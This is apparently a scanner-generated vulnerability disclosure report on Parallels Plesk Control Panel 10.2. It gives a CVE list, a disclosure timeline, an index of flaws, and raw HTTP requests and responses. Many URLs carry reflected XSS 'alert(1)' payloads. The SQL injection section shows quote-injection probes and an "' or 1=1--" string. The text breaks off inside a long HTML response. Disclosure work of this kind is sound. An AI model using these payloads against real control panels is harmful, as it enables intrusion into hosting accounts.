CVE-2011-4734, CVE-2011-4735, CVE-2011-4736, CVE-2011-4737, CVE-2011-4738, CVE-2011-4739, CVE-2011-4740, CVE-2011-4741, CVE-2011-4742, CVE-2011-4743, CVE-2011-4744XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, Plesk Control Panel Version 20110407.20 for Windows

Report generated by XSS.CX at Tue May 24 05:40:53 CDT 2011 with respect to Plesk CPANEL for Windows Build 20110407.20 on Windows 2008 R2 Server, 64 Bit

Plesk SMB 10.2 for Windows Report of October 2010 | Plesk SMB 10.2 - Site Editor for Windows Report of October 2010

XSS.CX Summary

Parallels Plesk Control Panel Version 20110407.20 for Windows and RHEL6 Linux Versions are vulnerable to XSS and other injection vulnerabilities beginning with a user of least-privs when logged into the Control Panel. Various exploit are possible from XSS to DoS. This report is specific to proving CWE-79, XSS as a user of least authentication within the Control Panel Application. Initially reported (privately) to Plesk in October 2010 in Parallels Ticket #1020740, these vulnerabilities, and others, still exist in the current releases of the Control Panel Products. Further reported to CERT in April 2011 with Ticket VU#541814. No contact received after June 1, 2011. Published September 21,2011 on XSS.CX.

Reflected XSS as Authenticated User in Plesk Control Panel Version 20110407.20.

XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

Parallels Plesk Control Panel Version 20110407.20 for Windows, Application Crash, PleskBadURIException

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86
Parallels Plesk Control Panel Version 20110407.20 for Windows, CWE-79, CAPEC-86, Stored XSS PoC XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

Plesk Control Panel Version 20110407.20

Parallels Plesk Control Panel Version 20110407.20 for Windows, Application Crash
XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

Plesk Control Panel Version 20110407.20

Immunity Debugger Screen Grab of W3P.EXE Program Termination, Call Stack, Registers, PHP5ts
XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

Loading

1. SQL injection

XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [no_frames_login_page cookie]

1.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/ [psaContext cookie]

1.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/ [PLESKSESSID cookie]

1.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/ [certificateslist cookie]

1.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [no_frames_logout_page cookie]

1.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E [no_frames cookie]

2. Cross-site scripting (reflected)

XSS in Parallels Plesk Control Panel 10.2 for Windows, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

2.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]

2.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]

2.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/ [email parameter]

2.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [cmd parameter]

2.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/ [wizard parameter]

2.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/download-progress/catalogId/marketplace/taskId/2 [REST URL parameter 7]

2.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]

2.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4 [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]

2.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]

2.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4 [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]

3. Cleartext submission of password

3.1. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3

3.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

3.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

3.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create

3.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create/

3.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

3.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/mail-list/create/

3.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

3.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

3.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/

3.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

3.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

3.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

3.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/edit

4. Password returned in later response

5. Cookie without HttpOnly flag set

5.1. http://vulnerable.plesk.control.panel.20110407.20:8880/

5.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

5.3. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3

5.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

5.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

5.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

5.7. http://vulnerable.plesk.control.panel.20110407.20:8880/get_password.php

5.8. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/backup/local-repository/

5.9. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/

5.10. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/

5.11. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/

5.12. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/

5.13. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/

5.14. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/

5.15. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

5.16. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/local-repository/

5.17. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/schedule/

5.18. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@

5.19. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/dns/

5.20. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/domain-alias@

5.21. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/aspdotnet/

5.22. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

5.23. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/

5.24. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/

5.25. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/permissions/

5.26. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/

5.27. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/view/

5.28. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/ftp-users/

5.29. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/hotlink-protection/

5.30. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/performance/

5.31. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/

5.32. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

5.33. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/

5.34. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/traffic-hosting

5.35. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/shared-ssl/

5.36. http://vulnerable.plesk.control.panel.20110407.20:8880/spaw/spaw.php

6. Password field with autocomplete enabled

6.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

6.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@1/properties/

6.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

6.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

6.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/

6.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

6.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

6.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

7. Cross-domain POST

8. Cross-domain Referer leakage

8.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

8.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/rename/

8.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace

8.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

8.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

9. File upload functionality

9.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/

9.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/

9.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/

9.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/certificate@

9.5. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/

10. Database connection string disclosed

11. Email addresses disclosed

11.1. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/1

11.2. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

11.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

11.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list

11.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list/

11.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/my-profile

11.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

11.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

11.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/3

11.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

11.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list

11.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list

11.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/list/

12. HTML does not specify charset

12.1. http://vulnerable.plesk.control.panel.20110407.20:8880/

12.2. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

12.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-dir/

12.4. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/register-domain/

12.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/

12.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog

12.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/install/metaId/1

12.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace

12.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create

12.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

12.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4

12.12. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

12.13. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4

12.14. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view

12.15. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/fdf080d9f1bbdb1b327620b2

12.16. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/view/id/1/%3Cscript%3Ealert(1)%3C/script%3E

13. Content type incorrectly stated

13.1. http://vulnerable.plesk.control.panel.20110407.20:8880/javascript/chk.js.php

13.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/

13.3. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/disable-featured-applications-promo

13.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/admin-home/featured-applications/

13.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog

13.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/2

13.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/ [no_frames_login_page cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/

Issue detail

The no_frames_login_page cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the no_frames_login_page cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /plesk/client@2/domain@1/hosting/file-manager/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted';

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:43 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:46 GMT
Connection: close
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>500 - Internal server error.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>500 - Internal server error.</h2>
<h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
</fieldset></div>
</div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted'';

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:35:47 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:35:49 GMT
Connection: close
Content-Length: 93511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot20541325%27%2520or%25201%253d1--%2520%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=web.view/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
